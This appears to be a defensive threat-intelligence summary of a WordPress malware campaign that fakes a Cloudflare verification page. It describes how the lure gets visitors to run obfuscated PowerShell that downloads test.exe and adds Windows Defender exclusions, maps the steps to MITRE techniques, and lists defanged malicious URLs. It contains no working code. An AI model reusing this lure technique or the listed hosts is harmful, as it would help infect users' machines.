A new variant of malware is targeting WordPress sites by mimicking a legitimate Cloudflare verification page to trick users into executing malicious PowerShell commands. This infection spreads across multiple themes and fake plugins, delivering malware in a multistage process to evade detection and maintain control. #CloudflareInfection #WordPressMalware
Keypoints
- The malware impersonates a Cloudflare verification page and instructs the victim to perform system commands to download and execute a malicious payload.
- The infection is embedded in multiple WordPress themes, specifically injecting code into the header.php file that references a fake verification.html page.
- The attack unfolds in three stages, starting with user interaction and culminating in downloading a PowerShell payload that downloads and executes additional malicious code.
- The malicious PowerShell scripts use obfuscation and request elevated privileges to bypass antivirus detection and Windows security features.
- The final payload downloads and extracts a ZIP file containing an executable (test.exe) and adds Windows Defender exclusions to evade detection, likely delivering information stealers or remote access trojans.
- Removal is complicated because the infection is spread across multiple themes and fake plugins, making detection and cleanup challenging.
- Users are strongly advised not to follow instructions prompting them to open the Run dialog (Win + R) and execute commands, as legitimate websites will never ask for this.
MITRE Techniques
- [T1204] User Execution – The malware tricks users into running a malicious command via a fake Cloudflare human verification page (“Ask user to copy and paste a malicious command”).
- [T1086] PowerShell – The attack uses an obfuscated PowerShell script to download and execute payloads with elevated privileges (“Launches a powershell command with elevated admin privileges”).
- [T1059] Command and Scripting Interpreter – PowerShell commands download and execute secondary scripts from a remote server (“Downloads a powershell command from an external source: https://workaem[.]eth[.]limo/x.txt”).
- [T1112] Modify Registry – Adds Windows Defender exclusions likely via registry modification to avoid detection (“adds Windows Defender exclusions to avoid detection”).
- [T1105] Ingress Tool Transfer – The PowerShell script downloads additional payloads, including ZIP files and executables, from remote servers (“Downloads the ZIP file (1.zip) and executes test.exe”).
Indicators of Compromise
- [Domain] Malicious hosting domains used for delivering payloads – workaem[.]eth[.]limo
- [File] Malicious files referenced in scripts – verification.html (fake Cloudflare page), test.exe (final payload executable)
- [Script URL] Remote script URLs used for payload delivery – https://workaem[.]eth[.]limo/x.txt, https://workaem[.]eth[.]limo/load.txt
Read more: https://blog.sucuri.net/2025/05/another-fake-cloudflare-verification-targets-wordpress-sites.html